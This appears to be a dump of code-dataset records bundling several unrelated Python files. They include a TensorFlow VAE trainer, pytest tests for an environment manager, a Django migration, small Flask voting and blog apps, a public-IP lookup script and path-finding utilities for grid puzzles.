sigmoid_cross_entropy_without_mean(labels=self.input1, logits=self.dec_output)\n\n # Loss\n self.rec_cost = tf.reduce_mean(self.rec_cost_vector)\n\n self.loss_dict = dict()\n for idx in range(self.args.nconti+1):\n weight = tf.constant(np.array(idx*[self.args.beta_min] + (self.args.nconti-idx)*[self.args.beta_max]), dtype=tf.float32)\n kl_cost = vae_kl_cost_weight(mean=self.mean_total, stddev=self.stddev_total, weight=weight)\n self.loss_dict[idx] = self.rec_cost+kl_cost+tf.losses.get_regularization_loss()+\\\n self.I_loss*self.I_weight+self.F_loss*self.F_weight\n\n tf.summary.scalar('rec_loss', self.rec_cost)\n tf.summary.scalar('I_loss', self.I_loss)\n tf.summary.scalar('F_loss', self.F_loss)\n self.merged = tf.summary.merge_all()\n\n # Decode\n self.latent_ph = tf.placeholder(tf.float32, shape = [self.args.nbatch, self.args.nconti+self.args.ncat])\n self.dec_output_ph = tf.nn.sigmoid(self.decoder_net(z=self.latent_ph, output_channel=self.nchannel, scope=\"decoder\", reuse=True)['output'])\n\n # Free Batch Decode\n self.free_latent_ph = tf.placeholder(tf.float32, shape = [None, self.args.nconti+self.args.ncat])\n self.free_dec_output_ph = tf.nn.sigmoid(self.decoder_net(z=self.free_latent_ph, output_channel=self.nchannel, scope=\"decoder\", reuse=True)['output'])\n\n self.logger.info(\"Model building ends\")\n\n def decode(self, latent_input):\n return apply_tf_op(inputs=latent_input, session=self.sess, input_gate=self.latent_ph, output_gate=self.dec_output_ph, batch_size=self.args.nbatch)\n\n def set_up_train(self):\n self.logger.info(\"Model setting up train starts\")\n\n if not hasattr(self, 'start_iter'): self.start_iter = 0\n self.logger.info(\"Start iter: {}\".format(self.start_iter))\n\n decay_func = DECAY_DICT[self.args.dtype]\n decay_params = DECAY_PARAMS_DICT[self.args.dtype][self.args.nbatch][self.args.dptype].copy() \n decay_params['initial_step'] = self.start_iter\n\n self.lr, update_step_op = decay_func(**decay_params)\n self.update_step_op = [update_step_op]\n\n var_list = [v for v in tf.trainable_variables() if 'encoder' in v.name] + \\\n [v for v in tf.trainable_variables() if 'decoder' in v.name] + \\\n [v for v in tf.trainable_variables() if 'discriminator' in v.name]\n\n self.train_op_dict = dict()\n with tf.control_dependencies(tf.get_collection(\"update_ops\")):\n for idx in range(self.args.nconti+1):\n self.train_op_dict[idx] = get_train_op_v2(tf.train.AdamOptimizer(learning_rate=self.lr, beta1=0.9, beta2=0.999), loss=self.loss_dict[idx], var_list=var_list)\n\n self.logger.info(\"Model setting up train ends\")\n\n def run_batch(self, train_idx):\n feed_dict = dict()\n feed_dict[self.input1] = self.dataset.next_batch(batch_size=self.args.nbatch)[0]\n feed_dict[self.istrain] = True\n feed_dict[self.epsilon_input] = np.random.normal(size=[self.args.nbatch, self.args.nconti])\n\n # For VC-Loss\n feed_dict[self.delta_dim] = np.random.randint(0, self.args.nconti, size=[self.args.nbatch])\n if self.args.switch_dis:\n objective_2_idx = np.random.randint(0, self.args.ncat, size=[self.args.nbatch])\n blank = np.zeros((objective_2_idx.size, self.args.ncat))\n blank[np.arange(objective_2_idx.size), objective_2_idx] = 1\n feed_dict[self.objective_2_idx] = blank\n\n if train_idx=self.args.ntime:\n idx = min(train_idx, self.args.nconti)\n else: \n idx = min(train_idx+1, self.args.nconti)\n # _, total_loss, rec_loss, I_loss, F_loss = self.sess.run([self.train_op_dict[idx], \n # self.loss_dict[idx], self.rec_cost, self.I_loss, self.F_loss], feed_dict=feed_dict)\n summary, _ = self.sess.run([self.merged, self.train_op_dict[idx]], feed_dict=feed_dict)\n return summary\n\n def train(self, niter, piter, siter, save_dir=None, asset_dir=None):\n self.logger.info(\"Model training starts\")\n current_time = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n train_log_dir = os.path.join(asset_dir, current_time, 'train')\n # test_log_dir = os.path.join(asset_dir, current_time, '/test')\n train_summary_writer = tf.summary.FileWriter(train_log_dir, self.sess.graph)\n\n final_iter = self.start_iter+niter\n max_accuracy = -1\n max_acc_iter = -1\n\n for iter_ in tqdm_range(self.start_iter, final_iter):\n train_idx = (iter_ - self.start_iter)//piter\n summary = self.run_batch(train_idx)\n train_summary_writer.add_summary(summary, iter_)\n\n if (iter_+1)%siter==0 or iter_+1==final_iter:\n include_discrete = False if train_idx < self.args.ntime else True\n accuracy = self.evaluate(include_discrete=include_discrete)\n\n self.latent_traversal_gif(path=asset_dir+'{}.gif'.format(iter_+1), include_discrete=include_discrete)\n if max_accuracy==-1 or max_accuracy 0, z_2, z_1)\n delta_z = z_1 - z_2\n if i == 0:\n labels = delta_z\n else:\n labels = np.concatenate([labels, delta_z], axis=0)\n\n if include_discrete:\n cat_dim = np.random.randint(0, self.args.ncat, size=[batch_size])\n cat_onehot = np.zeros((batch_size, self.args.ncat))\n cat_onehot[np.arange(cat_dim.size), cat_dim] = 1\n else:\n cat_onehot = np.zeros((batch_size, self.args.ncat))\n img_1 = self.sess.run(self.free_dec_output_ph, \n feed_dict={self.free_latent_ph: \n np.concatenate([z_1, cat_onehot], axis=1)})\n img_2 = self.sess.run(self.free_dec_output_ph, \n feed_dict={self.free_latent_ph: \n np.concatenate([z_2, cat_onehot], axis=1)})\n # [b, h, w, c]\n for j in range(img_1.shape[0]):\n pair_np = np.concatenate([img_1[j], img_2[j]], axis=1)\n pair_np = (pair_np * 255).astype(np.uint8)\n img = Image.fromarray(pair_np)\n img.save(os.path.join(pairs_path, 'pair_%06d.jpg' % (i * batch_size + j)))\n # if i == 0:\n # imgs = np.concatenate([img_1, img_2], axis=2)\n # else:\n # imgs_i = np.concatenate([img_1, img_2], axis=2)\n # imgs = np.concatenate([imgs, imgs_i], axis=0)\n\n write_npy(labels, os.path.join(pairs_path, 'labels.npy'))\n # write_npy((imgs * 255).astype(np.uint8), os.path.join(pairs_path, 'imgs.npy'))\n # np.savez_compressed(os.path.join(pairs_path, 'imgs.npy'), (imgs * 255).astype(np.uint8))\n","sub_path":"Dsprites_exp/CascadeVAE-VC/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551079101","text":"import pytest\n\nfrom envmanager.decorators import env_loader\nfrom envmanager.tests.data import envloader_config_from_dict_multiapp\n\nconfig = envloader_config_from_dict_multiapp\n\n\"\"\"\nTests use of dictionary schema:\n - Set, retrieve and clear string keys and assert string values (as-is)\n - Get and clear schema keys and assert schema dictated types and expected values\n\"\"\"\n\n\n@pytest.fixture\ndef env():\n @env_loader(config)\n def inner():\n from envmanager.core import Env\n return Env(config)\n\n return inner()\n\n\ndef test_set_value(env):\n env.set('my_key', 1234)\n res = env.int('my_key')\n assert res == 1234, \"testing setting custom string my_key failed\"\n assert env.clear('my_key') is True, \"testing setting custom string when mode popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_same_key_from_group_1(env):\n with env.group('GROUP1'):\n res = env('duplicate_string')\n assert res == 'dups', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_same_key_from_group_2(env):\n with env.group('GROUP2'):\n res = env('duplicate_string')\n assert res == 'dups2', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_same_key_from_group_both(env):\n with env.group('GROUP2'):\n res = env('duplicate_string')\n assert res == 'dups2', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n with env.group('GROUP1'):\n res = env('duplicate_string')\n assert res == 'dups', \"test get duplicate_string failed\"\n assert env.clear('duplicate_string') is True, \"test get when duplicate_string popped\"\n # cannot retrieve anymore or throws an error\n\n\ndef test_get_prepended_keys_from_group_1(env):\n with env.group('GROUP1'):\n with env.prepend('zero'):\n res = env('one')\n assert res == 'one', \"test get zero_one failed\"\n assert env.clear('one') is True, \"test get when zero_one popped\"\n with env.prepend('one'):\n res = env('two')\n assert res == 'two', \"test get zero_one failed\"\n assert env.clear('two') is True, \"testing setting when zero_one popped\"\n","sub_path":"envmanager/tests/test_multi_group.py","file_name":"test_multi_group.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"441070206","text":"import json \nimport pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom stable_baselines3.common.results_plotter import X_EPISODES, ts2xy, window_func\n\ndef save_rewards(log_dir, num_drones, num_episodes):\n file_name = f\"{num_drones}_{num_episodes}.monitor.csv\"\n headers = []\n with open(log_dir + file_name, \"rt\") as file_handler:\n first_line = file_handler.readline()\n assert first_line[0] == \"#\"\n header = json.loads(first_line[1:])\n data_frame = pandas.read_csv(file_handler, index_col=None)\n headers.append(header)\n data_frame[\"t\"] += header[\"t_start\"]\n data_frame.sort_values(\"t\", inplace=True)\n data_frame[\"t\"] -= min(header[\"t_start\"] for header in headers)\n\n (x,y) = ts2xy(data_frame, X_EPISODES)\n\n plt.figure(\"Coverage Mission\", figsize=(8, 2))\n max_x = x[-1]\n min_x = 0\n plt.scatter(x, y, s=2)\n # Compute and plot rolling mean with window of size EPISODE_WINDOW\n x, y_mean = window_func(x, y, 25, np.mean)\n plt.plot(x, y_mean)\n plt.xlim(min_x, max_x)\n plt.title(f\"Coverage Mission | {num_drones} Drones | {num_episodes} Episodes\")\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Episode Reward\")\n plt.tight_layout()\n plt.savefig(log_dir + f\"rewards_{num_drones}_{num_episodes}\")","sub_path":"TG/rewards.py","file_name":"rewards.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52425397","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Amigo',\n fields=[\n ('amigo_pk', models.AutoField(primary_key=True, serialize=False)),\n ],\n options={\n 'db_table': 'amigo',\n },\n ),\n migrations.CreateModel(\n name='EstructuraGramatical',\n fields=[\n ('estructura_gramatical_pk', models.AutoField(primary_key=True, serialize=False)),\n ('nombre', models.CharField(max_length=100)),\n ],\n options={\n 'db_table': 'estructura_gramatical',\n },\n ),\n migrations.CreateModel(\n name='FraseGramatical',\n fields=[\n ('frase_gramatical_pk', models.AutoField(primary_key=True, serialize=False)),\n ('frase', models.CharField(max_length=500)),\n ('estructura_gramatical_fk', models.ForeignKey(db_column='estructura_gramatical_fk', to='thomas.EstructuraGramatical', on_delete=django.db.models.deletion.PROTECT)),\n ],\n options={\n 'db_table': 'frase_gramatical',\n },\n ),\n migrations.CreateModel(\n name='Rol',\n fields=[\n ('rol_pk', models.AutoField(primary_key=True, serialize=False)),\n ('nombre', models.CharField(max_length=45)),\n ],\n options={\n 'db_table': 'rol',\n },\n ),\n migrations.CreateModel(\n name='Usuario',\n fields=[\n ('usuario_pk', models.AutoField(primary_key=True, serialize=False)),\n ('dni', models.CharField(max_length=45)),\n ('nombre', models.CharField(max_length=45)),\n ('apellido1', models.CharField(max_length=45)),\n ('apellido2', models.CharField(max_length=45, null=True)),\n ('username', models.CharField(max_length=45)),\n ('password', models.CharField(max_length=45)),\n ('activo', models.NullBooleanField()),\n ('mail', models.EmailField(max_length=45, null=True)),\n ('fotografia', models.ImageField(upload_to='', null=True)),\n ],\n options={\n 'db_table': 'usuario',\n },\n ),\n migrations.CreateModel(\n name='UsuarioRol',\n fields=[\n ('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),\n ('rol_fk', models.ForeignKey(db_column='rol_fk', to='thomas.Rol', on_delete=django.db.models.deletion.PROTECT)),\n ('usuario_fk', models.ForeignKey(db_column='usuario_fk', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT)),\n ],\n options={\n 'db_table': 'usuario_rol',\n },\n ),\n migrations.CreateModel(\n name='Word',\n fields=[\n ('word_pk', models.AutoField(primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=100)),\n ('translation', models.CharField(max_length=200)),\n ('comment', models.TextField(null=True)),\n ('favorite', models.NullBooleanField()),\n ],\n options={\n 'db_table': 'word',\n },\n ),\n migrations.CreateModel(\n name='WordAmigo',\n fields=[\n ('word_amigo_pk', models.AutoField(primary_key=True, serialize=False)),\n ('usuario', models.ForeignKey(db_column='usuario_fk', related_name='usuario', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT)),\n ('word', models.ForeignKey(db_column='word_fk', related_name='word', to='thomas.Word', on_delete=django.db.models.deletion.PROTECT)),\n ],\n options={\n 'db_table': 'word_amigo',\n },\n ),\n migrations.AddField(\n model_name='rol',\n name='usuarios',\n field=models.ManyToManyField(to='thomas.Usuario', through='thomas.UsuarioRol'),\n ),\n migrations.AddField(\n model_name='amigo',\n name='usuarioReceptor',\n field=models.ForeignKey(db_column='usu_receptor_fk', related_name='usuarioReceptor', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT),\n ),\n migrations.AddField(\n model_name='amigo',\n name='usuarioSolicitante',\n field=models.ForeignKey(db_column='usu_solicitante_fk', related_name='usuarioSolicitante', to='thomas.Usuario', on_delete=django.db.models.deletion.PROTECT),\n ),\n ]\n","sub_path":"thomas/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650427392","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n#\n# File: WhatIsMyIp.py\n# Auth: Mattia Oss \n# Date: Sun, 23 Mar 2008 18:12:26 +0100\n\n# print urllib2.urlopen(\"http://www.whatismyip.com/\").read()\n\n# from urllib.request import urlopen\n# for line in urlopen('http://www.whatismyip.com/'):\n # line = line.decode('utf-8') # Decoding the binary data to text.\n # print(line)\n\ndef old():\n\n from urllib.request import Request, urlopen\n\n req = Request('http://www.whatismyip.com/', headers={'User-Agent': 'Mozilla/5.0'})\n webpage = urlopen(req).read()\n print(webpage)\n\n with open('/home/mattia/mydata/python/scripts/files/What-is-my-ip.org.py/webpage','r') as f:\n webpage = f.read()\n\nfrom urllib.request import Request, urlopen\nimport re\ndef getPublicIp():\n data = str(urlopen('http://checkip.dyndns.com/').read())\n # data = 'Current IP CheckCurrent IP Address: 65.96.168.198\\r\\n'\n\n return re.compile(r'Address: (\\d+\\.\\d+\\.\\d+\\.\\d+)').search(data).group(1)\n\nprint(getPublicIp())\n","sub_path":"WhatIsMyIp.py","file_name":"WhatIsMyIp.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"389773022","text":"# load env vars\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nfrom flask import Flask, request, make_response, jsonify\n\nimport bot\n\napp = Flask(__name__)\n\n\n@app.route('/votes')\ndef get_votes():\n if bot.is_voting():\n response = make_response(jsonify(data={\n \"title\": bot.get_question(),\n \"votes\": list(bot.get_votes().values()),\n \"labels\": list(bot.get_votes().keys())\n }), 200)\n else:\n response = make_response(jsonify(data={\n \"title\": \"No ongoing poll!\",\n \"votes\": [],\n \"labels\": []\n }), 200)\n\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n\n@app.route('/vote', methods=['POST'])\ndef start_vote():\n body = request.json\n print(body)\n bot.start_voting(body['opts'], body['phrase'])\n return make_response(jsonify(success=True), 200)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', ssl_context='adhoc')\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"323636185","text":"# blog.py\n\nfrom flask import Flask, request, redirect, \\\n\t\t\t\t url_for, render_template, \\\n\t\t\t\t Blueprint, flash\nfrom markdown import markdown\n\nimport db\nimport auth\nfrom flask_login import current_user, login_required\n\nblog = Blueprint('blog', __name__,\n template_folder='templates',\n url_prefix='/blog')\nblogs = db.table('blog')\n\n@blog.route('/')\ndef main():\n blogid = request.args.get(\"id\")\n if blogid and blogid.isalnum() and current_user.is_authenticated:\n if not blogid in blogs:\n can_edit = set(filter(\"\".__ne__,\n request.args.get(\"edit\", \"\").split(\" \")))\n\n can_view = set(filter(\"\".__ne__,\n request.args.get(\"view\", \"\").split(\" \"))).union(can_edit)\n\n can_edit.add(\"@\" + current_user.name)\n blogs[blogid] = {\n \"text\": \"\",\n \"id\": blogid,\n \"author\": current_user.name,\n \"access_policy\": {\n \"view\": list(can_view),\n \"edit\": list(can_edit)\n }\n }\n blogs.commit()\n return redirect(url_for(\"blog.edit\", id=blogid))\n else:\n return render_template('blog.html', blogs=blogs)\n\n@blog.route('/edit')\ndef edit():\n blogid = request.args.get('id')\n if blogid == None:\n return redirect(url_for('blog.main'))\n \n user_can = auth.rights(current_user, blogs[blogid][\"access_policy\"])\n \n if blogid in blogs and user_can[\"edit\"]:\n if request.args.get(\"action\") == \"view\":\n blogs[blogid][\"text\"] = request.args.get(\"text\")\n blogs.commit()\n return redirect(url_for(\"blog.view\", id=blogid))\n elif request.args.get(\"action\") == \"save\":\n blogs[blogid][\"text\"] = request.args.get(\"text\")\n blogs.commit()\n return redirect(url_for(\"blog.edit\", id=blogid))\n else:\n return render_template(\n 'edit_blog.html',\n blog=blogs[blogid])\n else:\n return redirect(url_for(\"blog.main\"))\n\n@blog.route('/view', methods=['GET'])\ndef view():\n blogid = request.args.get(\"id\")\n\n if blogid in blogs:\n blogg = blogs[blogid]\n print(\"user:\",current_user)\n user_can = auth.rights(current_user, blogg[\"access_policy\"])\n if user_can[\"view\"]:\n content = markdown(blogs[blogid][\"text\"],\n extensions=[\"tables\"])\n edit_button = \"\"\"
\n
\n \n \n
\"\"\".format(blogid)\n head = \"\"\"\n \n \n Blog {}\n \n \n \"\"\".format(blogid)\n tail = \"\"\n if user_can[\"edit\"]:\n return head + content + edit_button + tail\n else:\n return head + content + tail\n else:\n return redirect(url_for('blog.main'))\n else:\n return redirect(url_for('blog.main'))\n","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"556848335","text":"import numpy as np\nfrom collections import OrderedDict\nfrom itertools import product\n\nfrom predictors.basic import *\n\nfrom base.field import *\nfrom base.iodata import *\nfrom utils import *\nfrom constants import *\n\n\nclass Colorizer():\n def __init__(self):\n self.colors = []\n #self.position = 0\n self.info = []\n self.path=None\n self.start_color = None\n\n def copy(self):\n newc = Colorizer()\n newc.colors = self.colors.copy()\n newc.info = self.info.copy()\n newc.path = self.path\n newc.start_color = self.start_color\n return newc\n\n def add_start_color(self, start, color):\n self.start_color = (start, color)\n\n def add_color(self, move, color):\n self.colors.append(color)\n self.info.append((move))\n \n def change_palette(self, start):\n #print(start)\n return self\n if len(self.colors) == 0:\n return self\n newc = Colorizer()\n newc.path = self.path\n h, w = self.path.start.shape\n if self.path.start[h//2, w//2] == self.colors[0]:\n colormap = {xo: xi for lo, li in zip(self.path.start, start)\n for xo, xi in zip(lo, li)}\n newc.colors = [ colormap.get(c, c) for c in self.colors]\n return newc\n return self\n\n def __iter__(self):\n if self.path.dx == 0 and self.path.dy == 0:\n while True:\n yield self.start_color[1]\n return\n position = 0\n if len(self.colors) == 0:\n raise StopIteration\n while True:\n yield self.colors[position]\n position = (position + 1) % len(self.colors)\n def __repr__(self):\n return str(self.colors)\n \n\nclass PathDescription:\n def __init__(self, x, y, dx, dy):\n self.x = x\n self.y = y\n self.dx = dx\n self.dy = dy\n self.start = None\n self.moves = []\n self.turn_conditions = []\n self.stop_conditions = []\n #self.total_length = 0\n self.positions = []\n self.rem = None\n self.colorizer = Colorizer()\n self.colorizer.path = self\n self.end = None\n \n def __eq__(self, o):\n if not (self.dx == o.dx and self.dy == o.dy):\n return False\n if self.start is not None and o.start is None:\n return False\n if self.start is None and o.start is not None:\n return False\n if self.start is None and o.start is None:\n return True\n if np.any(self.start != o.start):\n return False\n if set([tuple(m.flatten()) for m in self.moves])!= set([tuple(m.flatten()) for m in o.moves]):\n return False\n if (self.end is None) != (o.end is None):\n return False\n if self.end is not None:\n if np.any(self.end != o.end):\n return False\n if self.rem is None and o.rem is not None:\n return False\n if self.rem is not None and o.rem is None:\n return False\n if self.rem is None:\n return True\n return self.rem == o.rem\n return True\n \n def score(self):\n if self.rem is None:\n return len(self.positions)\n return len(self.positions) + self.rem.score()\n\n def merge(self, p):\n new_path = PathDescription(self.x, self.y, self.dx, self.dy)\n new_path.moves = self.moves + p.moves\n new_path.start = self.start\n new_path.end = p.end\n new_path.turn_conditions = self.turn_conditions + p.turn_conditions\n new_path.turn_conditions += [(self.end, p.dx, p.dy)]\n new_path.stop_conditions = self.stop_conditions + p.stop_conditions + [self.end]\n #new_path = self.total_length+ p.total_length\n new_path.positions = self.positions + p.positions\n return new_path\n\n def get_nsegments(self):\n if self.rem is None:\n return 1\n return 1+self.rem.get_nsegments()\n\n def flat_positions(self):\n if self.dx == 0 and self.dy ==0:\n return [(self.x, self.y)]\n if self.rem is None:\n return self.positions\n return self.positions + self.rem.flat_positions()\n\n def copy(self):\n new_path = PathDescription(self.x, self.y, self.dx, self.dy)\n new_path.moves = self.moves\n new_path.start = self.start\n new_path.end = self.end\n new_path.turn_conditions = self.turn_conditions #+ p.turn_conditions\n #new_path.turn_conditions += [(self.end, p.dx, p.dy)]\n new_path.stop_conditions = self.stop_conditions #+ p.stop_conditions + [self.end]\n #new_path = self.total_length+ p.total_length\n new_path.positions = self.positions # + p.positions\n new_path.colorizer = self.colorizer.copy()\n new_path.colorizer.path = new_path\n return new_path\n \n def add_path(self, p):\n new_path = self.copy()\n new_path.rem = p.copy()\n return new_path\n \n def add_paths(self, paths):\n for p in paths:\n new_path = PathDescription(self.x, self.y, self.dx, self.dy)\n new_path.moves = self.moves + p.moves\n new_path.turn_conditions = self.turn_conditions + p.turn_conditions\n new_path.stop_conditions = self.stop_conditions + p.stop_conditions\n #new_path = self.total_length+ p.total_length\n p.positions = self.positions + p.positions\n yield p\n\n def get_last_pos(self):\n if self.rem is None:\n x, y = ([(self.x, self.y)] + self.positions)[-1]\n else:\n print(\"rem is not None\")\n print(self.rem)\n x, y = self.rem.get_last_pos()\n return x, y\n\n def __repr__(self):\n x, y = ([(self.x, self.y)] + self.positions)[-1]\n path_line = f\"Path of {len(self.positions)} steps from {(self.x, self.y)} to {(x, y)} ({self.positions}), {self.dx, self.dy}\"\n if self.rem is None:\n return path_line\n path_line+= \"\\n->\\n\"+str(self.rem)\n return path_line\n\n\nclass StopConditions:\n def __init__(self):\n self.info = OrderedDict()\n pass\n def add(self, dx, dy, cell):\n if not (dx, dy) in self.info:\n self.info[(dx, dy)] = set()\n self.info[(dx, dy)].add(tuple(cell.flatten()))\n def add_square(self, cell):\n for dx, dy in product([-1, 0, 1], [-1, 0, 1]):\n if dx == 0 and dy==0:\n continue\n self.add(dx, dy, cell)\n\n def is_stop(self, dx, dy, cell):\n if not (dx, dy) in self.info:\n return False\n i = tuple(cell.flatten())\n return i in self.info[(dx, dy)]\n def __repr__(self):\n return str(self.info)\n\n\n\nclass PathCollection:\n def __init__(self, paths):\n self.collection = OrderedDict()\n #self.kernel_size = kernel_size\n #self.hwkernel = 2*kernel_size + 1\n for p in paths:\n self.add_path(p)\n pass\n\n def add_path(self, path):\n start = tuple(path.start.flatten())\n if not start in self.collection:\n self.collection[start] = []\n if not path in self.collection[start]:\n #print(\"path already present\", str(path))\n self.collection[start].append(path)\n\n def __repr__(self):\n result = []\n for k in self.collection:\n size = int(np.sqrt(len(k)))\n result.append(f\"{np.asarray(list(k)).reshape(size, -1)}\")\n for p in self.collection[k]:\n result.append(f\" {str(p)}\")\n\n moves = \"\\n->\\n\".join([str(move) for move in p.moves ])\n result.append(moves)\n result.append(str(p.end))\n return \"\\n\".join(result)\n \n @classmethod\n def build(cls, paths):\n path_collection = cls(paths)\n return path_collection\n\n\nclass PointConnectorUtils:\n @staticmethod\n def get_conditions(inp, out, sx, sy, dx, dy,\n stop_conditions=StopConditions(),\n kernel_size=1, debug=False):\n inp_ = np.pad(inp, kernel_size, constant_values=-1).copy()\n out_ = np.pad(out, kernel_size, constant_values=-1).copy()\n hwkernel = 2*kernel_size + 1\n if inp_[sx + kernel_size + dx, sy + kernel_size + dy] == out_[sx + kernel_size + dx, sy + kernel_size + dy]:\n return None\n if inp_[sx + kernel_size + dx, sy + kernel_size + dy] not in np.arange(10):\n if debug:\n print(inp_[sx + kernel_size + dx, sy + kernel_size + dy])\n return None\n path = PathDescription(sx, sy, dx, dy)\n path.start = inp_[sx : sx + hwkernel, sy : sy + hwkernel].copy()\n path.colorizer.add_start_color(inp_[sx + kernel_size, sy + kernel_size], out_[sx + kernel_size, sy + kernel_size])\n if stop_conditions.is_stop(dx, dy, path.start):\n return None\n # moves = []\n # positions = []\n # turn_conditions = []\n # stop_conditions = []\n x = sx\n y = sy\n for step in range(100):\n x += dx\n y += dy\n #print(dx, dy, inp_[x + kernel_size, y + kernel_size])\n if (inp_[x + kernel_size, y + kernel_size] != 10 and \\\n inp_[x + kernel_size, y + kernel_size] != out_[x + kernel_size, y + kernel_size]):\n path.positions.append((x, y))\n else:\n break\n if len(path.positions) == 0:\n #stop_conditions.add(dx, dy, path.start)\n return None\n # path.stop_conditions.append(inp_[sx:sx + hwkernel, sy: sy + hwkernel].copy())\n # return path, inp_, out_\n for k, (x, y) in enumerate(path.positions):\n move = inp_[x : x + hwkernel, y : y + hwkernel].copy()\n if inp_[x + kernel_size, y + kernel_size] == 10:\n return None\n color = out_[x + kernel_size, y + kernel_size]\n path.colorizer.add_color(move, color)\n path.moves.append(move)\n inp_[x + kernel_size, y + kernel_size] = 10\n path.end = inp_[x: x + hwkernel, y:y + hwkernel].copy()\n #stop_conditions.add(dx, dy, path.end)\n path.moves = OrderedDict.fromkeys([tuple(m.flatten()) for m in path.moves])\n path.moves = [np.asarray(list(m)).reshape(hwkernel, hwkernel) for m in path.moves]\n # for dx_, dy_ in product([-1, 0, 1], [-1, 0, 1]):\n # if dx_ == -dx and dy_ == -dy:\n # continue\n # if dx_ == 0 and dy_ == 0:\n # continue\n # new_direction = get_conditions(inp_[1:-1], out_[1:-1], x, y, dx_, dy_)\n return path, \\\n inp_[kernel_size : -kernel_size, kernel_size : -kernel_size], \\\n out_[kernel_size : -kernel_size, kernel_size : -kernel_size]\n\n @staticmethod\n def filter_paths(res):\n #r = [x for x in res]\n allpos = OrderedDict()\n for k, (score, (p, i, o)) in enumerate(res):\n if p.dx == 0 and p.dy==0:\n positions = [(p.x, p.y)]\n else:\n positions = p.positions\n for pos in positions:\n if not pos in allpos:\n allpos[pos] = [k]\n else:\n l = allpos[pos][0]\n if res[l][0] == score:\n allpos[pos].append(k)\n elif res[l][0] < score:\n allpos[pos] = [k]\n paths = set([x for xs in allpos.values() for x in xs])\n return [res[k] for k in paths]\n\n \n @staticmethod\n def filter_by_segments(res):\n allpos = OrderedDict()\n for k, (score, (p, i, o)) in enumerate(res):\n pos = tuple(sorted(set(p.flat_positions())))\n if pos not in allpos:\n allpos[pos] = []\n n = (p.get_nsegments(), k)\n allpos[pos].append(n)\n for k in allpos:\n nseg = min([x[0] for x in allpos[k]])\n allpos[k] = [v for u, v in allpos[k] if u == nseg]\n \n return [res[k] for ks in allpos.values() for k in ks]\n\n\n @classmethod\n def get_point_changes(cls, inp, out, x, y,\n stop_conditions=StopConditions(), kernel_size=1, debug=False):\n inp_ = np.pad(inp, kernel_size, constant_values=-1).copy()\n out_ = np.pad(out, kernel_size, constant_values=-1).copy()\n hwkernel = 2 * kernel_size + 1\n start = inp_[x : x + hwkernel, y : y + hwkernel]\n start_out = out_[x : x + hwkernel, y : y + hwkernel]\n if np.all(start == start_out):\n return None\n for i in range(0, start.shape[0]):\n for j in range(0, start.shape[1]):\n if i == kernel_size and j == kernel_size:\n continue\n if start[i, j] != start_out[i, j]:\n return None\n path = PathDescription(x, y, 0, 0)\n path.start = inp_[x : x + hwkernel, y : y + hwkernel].copy()\n path.end = out_[x : x + hwkernel, y : y + hwkernel].copy()\n path.colorizer.add_start_color(inp_[x + kernel_size, y + kernel_size], out_[x + kernel_size, y + kernel_size])\n inp_[x + kernel_size, y + kernel_size] = 10\n return 0, (path, inp_[kernel_size:-kernel_size], out_[kernel_size:-kernel_size])\n \n \n @classmethod\n def get_paths_from_point(cls, inp, out, x, y, last_dx=0, last_dy=0,\n stop_conditions=StopConditions(), kernel_size=1, debug=False, recursive=False):\n if debug:\n print(\"get_path_from_point call\")\n #print(inp, out)\n print(x, y, last_dx, last_dy)\n #if inp[x, y] not in np.arange(10):\n # return []\n scores = []\n for dx, dy in product([-1, 0, 1], [-1, 0, 1]):\n if dx == 0 and dy == 0:\n continue\n if dx == last_dx and dy == last_dy:\n continue\n if dx == -last_dx and dy == -last_dy:\n continue\n res = cls.get_conditions(inp, out, x, y, dx, dy, stop_conditions=stop_conditions,\n kernel_size=kernel_size, debug=debug)\n if debug:\n print(x, y, last_dx, last_dy, dx, dy, res)\n #path, inp, out = res\n if res is None:\n continue\n if res is not None:\n path, inp_, out_ = res\n score = path.score()\n #print(\"score\", score)\n #if score==1:\n # print(inp, inp_)\n #if last_dx == 0 and last_dy == 0 and score == 1 and recursive:\n # continue\n scores.append((score, (path, inp_, 